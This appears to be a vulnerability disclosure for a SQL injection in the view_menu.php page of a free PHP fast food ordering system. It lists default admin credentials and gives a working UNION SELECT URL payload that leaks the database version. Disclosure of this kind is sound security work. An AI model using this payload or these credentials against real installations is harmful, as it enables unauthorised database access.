# SQL Injection Vulnerability in /ffos/admin/menus/view_menu.php Vendors Link: https://www.sourcecodester.com/php/15366/fast-food-ordering-system-phpoop-free-source-code.html Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-ffos.zip Vulnerability File: `/ffos/admin/menus/view_menu.php` Vulnerability location: `/ffos/admin/menus/view_menu.php?id=<id>` ## PoC 1. Log in to the application using the admin credentials: - Username: admin - Password: admin123 2. Navigate to the menu list page at: - URL: http://localhost/ffos/admin/?page=menus 3. From the menu list, select the "Action" dropdown and click "View" to access the vulnerable endpoint (/ffos/admin/menus/view_menu.php). 4. http://localhost/ffos/admin/menus/view_menu.php?id=1 ![image](https://hackmd.io/_uploads/BJsutj8hyx.png) Modify the URL or input field with the following payload: [+] Payload: `http://localhost/ffos/admin/menus/view_menu.php?id=xxx'+union+select+1,2,3,4,5,6,7,8,9,10,group_concat("result:+",version())--+-` The response will display the database version ![image](https://hackmd.io/_uploads/SyhH5oIhJl.png)